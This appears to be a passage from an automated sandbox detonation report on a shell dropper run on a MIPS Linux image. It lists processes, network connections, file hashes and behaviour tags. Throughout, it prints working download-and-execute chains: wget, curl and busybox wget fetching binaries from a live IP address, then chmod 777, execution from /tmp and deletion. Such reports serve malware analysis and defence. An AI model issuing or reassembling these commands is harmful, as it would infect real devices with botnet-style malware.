[chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ

[./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/rm

[rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/chmod

[chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e

[./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/rm

[rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/usr/bin/wget

[wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/chmod

[chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t

[./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/rm

[rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/usr/bin/wget

[wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/chmod

[chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5

[./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/rm

[rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/usr/bin/wget

[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/chmod

[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB

[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/rm

[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/usr/bin/wget

[wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/chmod

[chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx

[./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/rm

[rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/usr/bin/wget

[wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/chmod

[chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo

[./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/rm

[rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/usr/bin/wget

[wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/chmod

[chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7

[./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/rm

[rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/usr/bin/wget

[wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/843-1-0xb6719000-0xb672a044-memory.dmp

memory/861-2-0xb6740000-0xb6751044-memory.dmp

memory/861-3-0xb6758000-0xb6769044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-21 08:15

Reported

2024-11-21 08:17

Platform

debian9-mipsbe-20240611-en

Max time kernel

151s

Max time network

155s

Command Line

[/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB N/A
N/A /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx N/A
N/A /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo N/A
N/A /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 N/A
N/A /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X N/A
N/A /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l N/A
N/A /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc N/A
N/A /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv N/A
N/A /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc N/A
N/A /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq N/A
N/A /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ N/A
N/A /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e N/A
N/A /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t N/A
N/A /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 N/A
N/A /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc N/A
N/A /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq N/A
N/A /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ N/A
N/A /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e N/A
N/A /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t N/A
N/A /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 N/A
N/A /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB N/A
N/A /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx N/A
N/A /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 /usr/bin/curl N/A
File opened for modification /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx /usr/bin/curl N/A
File opened for modification /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 /usr/bin/curl N/A
File opened for modification /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc /usr/bin/curl N/A
File opened for modification /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq /usr/bin/curl N/A
File opened for modification /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t /usr/bin/curl N/A
File opened for modification /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 /usr/bin/curl N/A
File opened for modification /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx /usr/bin/curl N/A
File opened for modification /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo /usr/bin/curl N/A
File opened for modification /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X /usr/bin/curl N/A
File opened for modification /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ /usr/bin/curl N/A
File opened for modification /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq /usr/bin/curl N/A
File opened for modification /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t /usr/bin/curl N/A
File opened for modification /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo /usr/bin/curl N/A
File opened for modification /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB /usr/bin/curl N/A
File opened for modification /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l /usr/bin/curl N/A
File opened for modification /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv /usr/bin/curl N/A
File opened for modification /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc /usr/bin/curl N/A
File opened for modification /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e /usr/bin/curl N/A
File opened for modification /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc /usr/bin/curl N/A
File opened for modification /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ /usr/bin/curl N/A
File opened for modification /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e /usr/bin/curl N/A
File opened for modification /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB /usr/bin/curl N/A

Processes

/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh

[/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/chmod

[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB

[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/bin/rm

[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]

/usr/bin/wget

[wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/chmod

[chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx

[./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/bin/rm

[rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]

/usr/bin/wget

[wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/chmod

[chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo

[./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/bin/rm

[rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]

/usr/bin/wget

[wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/chmod

[chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7

[./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/bin/rm

[rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]

/usr/bin/wget

[wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/chmod

[chmod 777 sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X

[./sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/bin/rm

[rm sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]

/usr/bin/wget

[wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/chmod

[chmod 777 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l

[./0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/bin/rm

[rm 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]

/usr/bin/wget

[wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/chmod

[chmod 777 TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc

[./TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/bin/rm

[rm TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]

/usr/bin/wget

[wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/chmod

[chmod 777 yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv

[./yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/bin/rm

[rm yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]

/usr/bin/wget

[wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/chmod

[chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc

[./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/rm

[rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/usr/bin/wget

[wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/chmod

[chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq

[./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/bin/rm

[rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/usr/bin/wget

[wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/chmod

[chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ

[./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/bin/rm

[rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/chmod

[chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e

[./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/bin/rm

[rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]

/usr/bin/wget

[wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/chmod

[chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t

[./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/bin/rm

[rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]

/usr/bin/wget

[wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/chmod

[chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5

[./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/bin/rm

[rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]

/usr/bin/wget

[wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/chmod

[chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc

[./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/bin/rm

[rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]

/usr/bin/wget

[wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]

/usr/bin/curl

